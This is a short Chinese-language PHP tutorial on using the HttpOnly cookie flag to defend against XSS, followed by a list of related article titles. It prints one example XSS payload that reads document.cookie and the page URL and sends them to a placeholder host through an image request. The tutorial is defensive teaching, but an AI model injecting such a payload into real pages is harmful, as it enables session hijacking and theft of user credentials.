xss防御之php利用httponly防xss攻击
2015-01-24信息快讯网
这篇文章主要介绍了xss防御之php利用httponly防xss攻击,下面是PHP设置HttpOnly的方法,需要的朋友可以参考下
xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。
如下js获取cookie信息:
url=document.top.location.href; cookie=document.cookie; c=new Image(); c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;
一般cookie都是从document对象中获取的,现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数,跟domain等其他参数一样,一旦这个HttpOnly被设置,你在浏览器的document对象中就看不到Cookie了。
PHP设置HttpOnly:
//在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性 ini_set("session.cookie_httponly", 1); //或者setcookie()的第七个参数设置为true session_set_cookie_params(0, NULL, NULL, NULL, TRUE);
对于PHP5.1以前版本的PHP通过:
header("Set-Cookie: hidden=value; httpOnly");
最后,HttpOnly不是万能的!
PHP中feof()函数实例测试
PHP实现利用MySQL保存session的方法
ThinkPHP后台首页index使用frameset时的注意事项分析
ThinkPHP模板替换与系统常量及应用实例教程
ThinkPHP调试模式与日志记录概述
destoon出现验证码不显示时的紧急处理方法
destoon供应信息title调用出公司名称的方法
destoon实现不同会员组公司名称显示不同的颜色的方法
destoon文章模块调用企业会员资料的方法
PHP函数http_build_query使用详解
PHP针对常规模板引擎中与CSS/JSON冲突的解决方法
php中Session的生成机制、回收机制和存储机制探究
PHP Session机制简介及用法
PHP实现取得HTTP请求的原文
PHP JSON出错:Cannot use object of type stdClass as array解决方法
PHP中模拟处理HTTP PUT请求的例子
php下获取http状态的实现代码
php实现httpclient类示例
php动态生成函数示例
php5.3 goto函数介绍和示例
php ctype函数中文翻译和示例
php的declare控制符和ticks教程(附示例)
php像数组一样存取和修改字符串字符
php设置session值和cookies的学习示例
PHP fopen()和 file_get_contents()应用与差异介绍
PHP的password_hash()使用实例
zf框架的session会话周期及次数限制使用示例
PHP中isset()和unset()函数的用法小结
php function用法如何递归及return和echo区别
php判断是否为json格式的方法
php ci框架中加载css和js文件失败的解决方法
php中调用其他系统http接口的方法说明
实现获取http内容的php函数分享
php使用curl访问https示例分享
解决file_get_contents无法请求https连接的方法
php中用socket模拟http中post或者get提交数据的示例代码